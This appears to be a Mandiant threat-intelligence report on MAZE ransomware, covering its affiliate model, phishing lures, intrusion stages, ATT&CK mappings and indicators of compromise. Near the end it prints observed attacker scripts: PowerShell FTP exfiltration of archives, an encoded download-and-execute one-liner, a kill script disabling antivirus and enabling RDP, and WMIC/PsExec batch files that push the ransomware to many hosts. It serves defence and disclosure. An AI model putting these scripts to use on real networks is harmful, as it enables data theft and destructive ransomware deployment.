Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

Victimology

We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government has been impacted demonstrating that indiscriminate nature of these operations (Figure 1).


Figure 1: Geographical and industry distribution of alleged MAZE victims

Multiple Actors Involved in MAZE Ransomware Operations Identified

Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers will partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement—each of which who appear to work on a percentage-basis. Notably, in some cases, actors may be hired on a salary basis (vs commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


Figure 2: MAZE ransomware panel

MAZE Initially Distributed via Exploit Kits and Spam Campaigns

MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG – Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


Figure 3: German-language lure

On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United states. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


Figure 4: AT&T email lure


Figure 5: Canada Post email lure

Shift to Post-Compromise Distribution Maximizes Impact

Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur due to the fact that numerous, disparate actors are involved in different phases of these operations. Notably, the time between initial compromise to encryption has also been widely varied, from weeks to many months.

Initial Compromise

There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

  • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
  • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account’s password.
  • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
  • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

Establish Foothold & Maintain Presence

The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable latter-stage operations.

  • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
  • Web shells were deployed to an internet-facing system. The system level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
  • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
  • An actor created a new domain account and added it to the domain administrators group.

Escalate Privileges

Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of Bloodhound, and more manual searches for files containing credentials.

  • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
  • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
  • The actor attempted to identify hosts running the KeePass password safe software.
  • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
  • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers’ efforts to understand the impacted organization’s Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

Reconnaissance

Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents maybe best highlights the divergent ways in which the responsible actors interact with victim networks.

  • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
  • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
  • Preliminary network reconnaissance has been conducted using a batch script named ‘2.bat’ which contained a series of nslookup commands. The output of this script was copied into a file named ‘2.txt’.
  • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
  • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
  • An actor employed the adfind tool and a batch script to collect information about their network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named ‘ad.7z’ using an instance of the 7zip archiving utility named 7.exe.
  • An actor used the tool smbtools.exe to assess whether accounts could login to systems across the environment.
  • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

Lateral Movement

Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

  • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate rdp sessions to enable both lateral movement and privilege escalation.
  • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
  • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
  • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

Complete Mission

There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various way (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

  • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
  • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
  • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
  • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
  • Prior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.

  • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
  • Attackers employed batch scripts and a series to txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
  • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
  • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
    • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
    • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment
    • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

Implications

Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

Mandiant Security Validation Actions

Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

  • A100-877 – Active Directory – BloodHound, CollectionMethod All
  • A150-006 – Command and Control – BEACON, Check-in
  • A101-030 – Command and Control – MAZE Ransomware, C2 Beacon, Variant #1
  • A101-031 – Command and Control – MAZE Ransomware, C2 Beacon, Variant #2
  • A101-032 – Command and Control – MAZE Ransomware, C2 Beacon, Variant #3
  • A100-878 – Command and Control – MAZE Ransomware, C2 Check-in
  • A100-887 – Command and Control – MAZE, DNS Query #1
  • A100-888 – Command and Control – MAZE, DNS Query #2
  • A100-889 – Command and Control – MAZE, DNS Query #3
  • A100-890 –  Command and Control – MAZE, DNS Query #4
  • A100-891 – Command and Control – MAZE, DNS Query #5
  • A100-509 – Exploit Kit Activity – Fallout Exploit Kit CVE-2018-8174, Github PoC
  • A100-339 – Exploit Kit Activity – Fallout Exploit Kit CVE-2018-8174, Landing Page
  • A101-033 – Exploit Kit Activity – Spelevo Exploit Kit, MAZE C2
  • A100-208 – FTP-based Exfil/Upload of PII Data (Various Compression)
  • A104-488 – Host CLI – Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
  • A104-046 – Host CLI – Collection, Exfiltration: Data from Local Drive using PowerShell
  • A104-090 – Host CLI – Collection, Impact: Creation of a Volume Shadow Copy
  • A104-489 – Host CLI – Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
  • A104-037 – Host CLI – Credential Access, Discovery: File & Directory Discovery
  • A104-052 – Host CLI – Credential Access: Mimikatz
  • A104-167 – Host CLI – Credential Access: Mimikatz (2.1.1)
  • A104-490 – Host CLI – Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
  • A104-491 – Host CLI – Defense Evasion, Persistence: MAZE, Create Target.lnk
  • A104-500 – Host CLI – Discovery, Defense Evasion: Debugger Detection
  • A104-492 – Host CLI – Discovery, Execution: Antivirus Query with WMI, PowerShell
  • A104-374 – Host CLI – Discovery: Enumerate Active Directory Forests
  • A104-493 – Host CLI – Discovery: Enumerate Network Shares
  • A104-481 – Host CLI – Discovery: Language Query Using PowerShell, Current User
  • A104-482 – Host CLI – Discovery: Language Query Using reg query
  • A104-494 – Host CLI – Discovery: MAZE, Dropping Ransomware Note Burn Directory
  • A104-495 – Host CLI – Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
  • A104-496 – Host CLI – Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
  • A104-027 – Host CLI – Discovery: Process Discovery
  • A104-028 – Host CLI – Discovery: Process Discovery with PowerShell
  • A104-029 – Host CLI – Discovery: Remote System Discovery
  • A104-153 – Host CLI – Discovery: Security Software Identification with Tasklist
  • A104-083 – Host CLI – Discovery: System Info
  • A104-483 – Host CLI – Exfiltration: PowerShell FTP Upload
  • A104-498 – Host CLI – Impact: MAZE, Desktop Wallpaper Ransomware Message
  • A104-227 – Host CLI – Initial Access, Lateral Movement: Replication Through Removable Media
  • A100-879 – Malicious File Transfer – Adfind.exe, Download
  • A150-046 – Malicious File Transfer – BEACON, Download
  • A100-880 – Malicious File Transfer – Bloodhound Ingestor Download, C Sharp Executable Variant
  • A100-881 – Malicious File Transfer – Bloodhound Ingestor Download, C Sharp PowerShell Variant
  • A100-882 – Malicious File Transfer – Bloodhound Ingestor Download, PowerShell Variant
  • A101-037 – Malicious File Transfer – MAZE Download, Variant #1
  • A101-038 – Malicious File Transfer – MAZE Download, Variant #2
  • A101-039 – Malicious File Transfer – MAZE Download, Variant #3
  • A101-040 – Malicious File Transfer – MAZE Download, Variant #4
  • A101-041 – Malicious File Transfer – MAZE Download, Variant #5
  • A101-042 – Malicious File Transfer – MAZE Download, Variant #6
  • A101-043 – Malicious File Transfer – MAZE Download, Variant #7
  • A101-044 – Malicious File Transfer – MAZE Download, Variant #8
  • A101-045 – Malicious File Transfer – MAZE Download, Variant #9
  • A101-034 – Malicious File Transfer – MAZE Dropper Download, Variant #1
  • A101-035 – Malicious File Transfer – MAZE Dropper Download, Variant #2
  • A100-885 – Malicious File Transfer – MAZE Dropper Download, Variant #4
  • A101-036 – Malicious File Transfer – MAZE Ransomware, Malicious Macro, PowerShell Script Download
  • A100-284 – Malicious File Transfer – Mimikatz W/ Padding (1MB), Download
  • A100-886 – Malicious File Transfer – Rclone.exe, Download
  • A100-484 – Scanning Activity – Nmap smb-enum-shares, SMB Share Enumeration

Detecting the Techniques

Platform

Signature Name

MVX (covers multiple FireEye technologies)

Bale Detection

FE_Ransomware_Win_MAZE_1

Endpoint Security

WMIC SHADOWCOPY DELETE (METHODOLOGY)

MAZE RANSOMWARE (FAMILY)

Network Security

Ransomware.Win.MAZE

Ransomware.Maze

Ransomware.Maze

MITRE ATT&CK Mappings

Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

MAZE Group 1 MITRE ATT&CK Mapping

ATT&CK Tactic Category

Techniques

Initial Access

T1133: External Remote Services

T1078: Valid Accounts

Execution

T1059: Command-Line Interface

T1086: PowerShell

T1064: Scripting

T1035: Service Execution

Persistence

T1078: Valid Accounts

T1050: New Service

Privilege Escalation

T1078: Valid Accounts

Defense Evasion

T1078: Valid Accounts

T1036: Masquerading

T1027: Obfuscated Files or Information

T1064: Scripting

Credential Access

T1110: Brute Force

T1003: Credential Dumping

Discovery

T1087: Account Discovery

T1482: Domain Trust Discovery

T1083: File and Directory Discovery

T1135: Network Share Discovery

T1069: Permission Groups Discovery

T1018: Remote System Discovery

T1016: System Network Configuration Discovery

Lateral Movement

T1076: Remote Desktop Protocol

T1105: Remote File Copy

Collection

T1005: Data from Local System

Command and Control

T1043: Commonly Used Port

T1105: Remote File Copy

T1071: Standard Application Layer Protocol

Exfiltration

T1002: Data Compressed

T1048: Exfiltration Over Alternative Protocol

Impact

T1486: Data Encrypted for Impact

T1489: Service Stop

MAZE Group 2 MITRE ATT&CK Mapping

ATT&CK Tactic Category

Techniques

Initial Access

T1193: Spearphishing Attachment

Execution

T1059: Command-Line Interface

T1086: PowerShell

T1085: Rundll32

T1064: Scripting

T1204: User Execution

T1028: Windows Remote Management

Persistence

T1078: Valid Accounts

T1050: New Service

T1136: Create Account

Privilege Escalation

T1078: Valid Accounts

T1050: New Service

Defense Evasion

T1078: Valid Accounts

T1140: Deobfuscate/Decode Files or Information

T1107: File Deletion

T1036: Masquerading

Credential Access

T1003: Credential Dumping

T1081: Credentials in Files

T1171: LLMNR/NBT-NS Poisoning

Discovery

T1087: Account Discovery

T1482: Domain Trust Discovery

T1083: File and Directory Discovery

T1135: Network Share Discovery

T1069: Permission Groups Discovery

T1018: Remote System Discovery

T1033: System Owner/User Discovery

Lateral Movement

T1076: Remote Desktop Protocol

T1028: Windows Remote Management

Collection

T1074: Data Staged

T1005: Data from Local System

T1039: Data from Network Shared Drive

Command and Control

T1043: Commonly Used Port

T1219: Remote Access Tools

T1105: Remote File Copy

T1071: Standard Application Layer Protocol

T1032: Standard Cryptographic Protocol

Exfiltration

T1020: Automated Exfiltration

T1002: Data Compressed

T1048: Exfiltration Over Alternative Protocol

Impact

T1486: Data Encrypted for Impact

MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

ATT&CK Tactic Category

Techniques

Initial Access

T1133: External Remote Services

T1078: Valid Accounts

Execution

T1059: Command-Line Interface

T1086: PowerShell

T1064: Scripting

T1035: Service Execution

Persistence

T1078: Valid Accounts

T1031: Modify Existing Service

Privilege Escalation

T1055: Process Injection

T1078: Valid Accounts

Defense Evasion

T1055: Process Injection

T1078: Valid Accounts

T1116: Code Signing

T1089: Disabling Security Tools

T1202: Indirect Command Execution

T1112: Modify Registry

T1027: Obfuscated Files or Information

T1108: Redundant Access

T1064: Scripting

Credential Access

T1003: Credential Dumping

Discovery

T1087: Account Discovery

T1482: Domain Trust Discovery

T1083: File and Directory Discovery

T1069: Permission Groups Discovery

T1018: Remote System Discovery

Lateral Movement

T1097: Pass the Ticket

T1076: Remote Desktop Protocol

T1105: Remote File Copy

T1077: Windows Admin Shares

Collection

T1074: Data Staged

T1039: Data from Network Shared Drive

Command and Control

T1043: Commonly Used Port

T1219: Remote Access Tools

T1105: Remote File Copy

T1071: Standard Application Layer Protocol

T1032: Standard Cryptographic Protocol

Exfiltration

T1002: Data Compressed

Impact

T1486: Data Encrypted for Impact

T1490: Inhibit System Recovery

T1489: Service Stop

Example Commands Observed in MAZE Ransomware Incidents

function Enum-UsersFolders($PathEnum)
{
    $foldersArr = ‘Desktop’,’Downloads’,’Documents’,’AppData/Roaming’,’AppData/Local’

    Get-ChildItem -Path $PathEnum’/c$’ -ErrorAction SilentlyContinue
    Get-ChildItem -Path $PathEnum’/c$/Program Files’ -ErrorAction SilentlyContinue
    Get-ChildItem -Path $PathEnum’/c$/Program Files (x86)’ -ErrorAction SilentlyContinue

    foreach($Directory in Get-ChildItem -Path $PathEnum’/c$/Users’ -ErrorAction SilentlyContinue) {

        foreach($SeachDir in $foldersArr) {
            Get-ChildItem -Path $PathEnum’/c$/Users/’$Directory’/’$SeachDir -ErrorAction SilentlyContinue
        }
    }
}

PowerShell reconnaissance script used to enumerate directories

$Dir="C:/Windows/Temp/"
#ftp server
$ftp = "ftp://<IP Address>/incoming/"
$user = "<username>"
$pass = "<password>"
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
#list every sql server trace file
foreach($item in (dir $Dir "*.7z")){
   "Uploading $item…"
   $uri = New-Object System.Uri($ftp+$item.Name)
   $webclient.UploadFile($uri, $item.FullName)
}

Decoded FTP upload PowerShell script

powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString(‘http://127.0.0.1:43984/’); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

Decoded FTP upload PowerShell script

[…]
echo 7
echo 7
taskkill /im csrss_tc.exe /f
taskkill /im kwsprod.exe /f
taskkill /im avkwctl.exe /f
taskkill /im rnav.exe /f
taskkill /im crssvc.exe /f
sc config CSAuth start= disabled
taskkill /im vsserv.exe /f
taskkill /im ppmcativedetection.exe /f
[…]
taskkill /im sahookmain.exe /f
taskkill /im mcinfo.exe /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
c:\windows\temp\sss.exe

Excerpt from windows.bat kill script

start copy sss.exe \\<internal IP>\c$\windows\temp\
start copy sss.exe \\<internal IP>\c$\windows\temp\

start copy windows.bat \\<internal IP>\c$\windows\temp\
start copy windows.bat \\<internal IP>\c$\windows\temp\

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

start psexec.exe \\<internal IP> -u < DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

Example commands from MAZE distribution scripts

@echo off
del done.txt
del offline.txt
rem Loop thru list of computer names in file specified on command-line
for /f %%i in (%1) do call :check_machine %%i
goto end
:check_machine
rem Check to see if machine is up.
ping -n 1 %1|Find "TTL=" >NUL 2>NUL
if errorlevel 1 goto down
echo %1
START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
timeout 1 > NUL
echo %1 >> done.txt
rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
goto end
:down
  rem Report machine down
  echo %1 >> offline.txt
:end

Example MAZE distribution script

Indicators of Compromise

Maze Payloads

064058cf092063a5b69ed8fd2a1a04fe

0f841c6332c89eaa7cac14c9d5b1d35b

108a298b4ed5b4e77541061f32e55751

11308e450b1f17954f531122a56fae3b

15d7dd126391b0e7963c562a6cf3992c

21a563f958b73d453ad91e251b11855c

27c5ecbb94b84c315d56673a851b6cf9

2f78ff32cbb3c478865a88276248d419

335aba8d135cc2e66549080ec9e8c8b7

3bfcba2dd05e1c75f86c008f4d245f62

46b98ee908d08f15137e509e5e69db1b

5774f35d180c0702741a46d98190ff37

5df79164b6d0661277f11691121b1d53

658e9deec68cf5d33ee0779f54806cc2

65cf08ffaf12e47de8cd37098aac5b33

79d137d91be9819930eeb3876e4fbe79

8045b3d2d4a6084f14618b028710ce85

8205a1106ae91d0b0705992d61e84ab2

83b8d994b989f6cbeea3e1a5d68ca5d8

868d604146e7e5cb5995934b085846e3

87239ce48fc8196a5ab66d8562f48f26

89e1ddb8cc86c710ee068d6c6bf300f4

910aa49813ee4cc7e4fa0074db5e454a

9eb13d56c363df67490bcc2149229e4c

a0c5b4adbcd9eb6de9d32537b16c423b

a3a3495ae2fc83479baeaf1878e1ea84

b02be7a336dcc6635172e0d6ec24c554

b40a9eda37493425782bda4a3d9dad58

b4d6cb4e52bb525ebe43349076a240df

b6786f141148925010122819047d1882

b93616a1ea4f4a131cc0507e6c789f94

bd9838d84fd77205011e8b0c2bd711e0

be537a66d01c67076c8491b05866c894

bf2e43ff8542e73c1b27291e0df06afd

c3ce5e8075f506e396ee601f2757a2bd

d2dda72ff2fbbb89bd871c5fc21ee96a

d3eaab616883fcf51dcbdb4769dd86df

d552be44a11d831e874e05cadafe04b6

deebbea18401e8b5e83c410c6d3a8b4e

dfa4631ec2b8459b1041168b1b1d5105

e57ba11045a4b7bc30bd2d33498ef194

e69a8eb94f65480980deaf1ff5a431a6

ef95c48e750c1a3b1af8f5446fa04f54

f04d404d84be66e64a584d425844b926

f457bb5060543db3146291d8c9ad1001

f5ecda7dd8bb1c514f93c09cea8ae00d

f83cef2bf33a4d43e58b771e81af3ecc

fba4cbb7167176990d5a8d24e9505f71

Maze Check-in IPs

91.218.114.11

91.218.114.25

91.218.114.26

91.218.114.31

91.218.114.32

91.218.114.37

91.218.114.38

91.218.114.4

91.218.114.77

91.218.114.79

92.63.11.151

92.63.15.6 

92.63.15.8 

92.63.17.245

92.63.194.20

92.63.194.3

92.63.29.137

92.63.32.2 

92.63.32.52

92.63.32.55

92.63.32.57

92.63.37.100

92.63.8.47

Maze-related Domains

aoacugmutagkwctu[.]onion

mazedecrypt[.]top 

mazenews[.]top

newsmaze[.]top

Maze Download URLs

http://104.168.174.32/wordupd_3.0.1.tmp

http://104.168.198.208/wordupd.tmp

http://104.168.201.35/dospizdos.tmp

http://104.168.201.47/wordupd.tmp

http://104.168.215.54/wordupd.tmp

http://149.56.245.196/wordupd.tmp

http://192.119.106.235/mswordupd.tmp

http://192.119.106.235/officeupd.tmp

http://192.99.172.143/winupd.tmp

http://54.39.233.188/win163.65.tmp

http://91.208.184.174:8079/windef.exe

http://agenziainformazioni[.]icu/wordupd.tmp

http://www.download-invoice[.]site/Invoice_29557473.exe

Malicious Documents

1a26c9b6ba40e4e3c3dce12de266ae10

53d5bdc6bd7904b44078cf80e239d42b

79271dc08052480a578d583a298951c5

a2d631fcb08a6c840c23a8f46f6892dd

ad30987a53b1b0264d806805ce1a2561

c09af442e8c808c953f4fa461956a30f

ee26e33725b14850b1776a67bd8f2d0a

BEACON C2s

173.209.43.61

193.36.237.173

37.1.213.9

37.252.7.142

5.199.167.188

checksoffice[.]me

drivers.updatecenter[.]icu

plaintsotherest[.]net

thesawmeinrew[.]net

updates.updatecenter[.]icu

Cobalt Strike Binaries

7507fe19afbda652e9b2768c10ad639f

a93b86b2530cc988f801462ead702d84

4f57e35a89e257952c3809211bef78ea

bad6fc87a98d1663be0df23aedaf1c62

f5ef96251f183f7fc63205d8ebf30cbf

c818cc38f46c604f8576118f12fd0a63

078cf6db38725c37030c79ef73519c0c

c255daaa8abfadc12c9ae8ae2d148b31

1fef99f05bf5ae78a28d521612506057

cebe4799b6aff9cead533536b09fecd1

4ccca6ff9b667a01df55326fcc850219

bad6fc87a98d1663be0df23aedaf1c62

Meterpreter C2s

5.199.167.188

Other Related Files

3A5A9D40D4592C344920DD082029B362 (related script)

76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)

b5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) 

fad3c6914d798e29a3fd8e415f1608f4 (related script)

Tools & Utilities

27304b246c7d5b4e149124d5f93c5b01 (PsExec)

42badc1d2f03a8b1e4875740d3d49336 (7zip)

75b55bb34dac9d02740b9ad6b6820360 (PsExec)

9b02dd2a1a15e94922be3f85129083ac (AdFind)

c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

Email Sender Domains

att-customer[.]com

att-information[.]com

att-newsroom[.]com

att-plans[.]com

bezahlen-1und1[.]icu

bzst-info[.]icu

bzst-inform[.]icu

bzstinfo[.]icu

bzstinform[.]icu

canada-post[.]icu

canadapost-delivery[.]icu

canadapost-tracking[.]icu

hilfe-center-1und1[.]icu

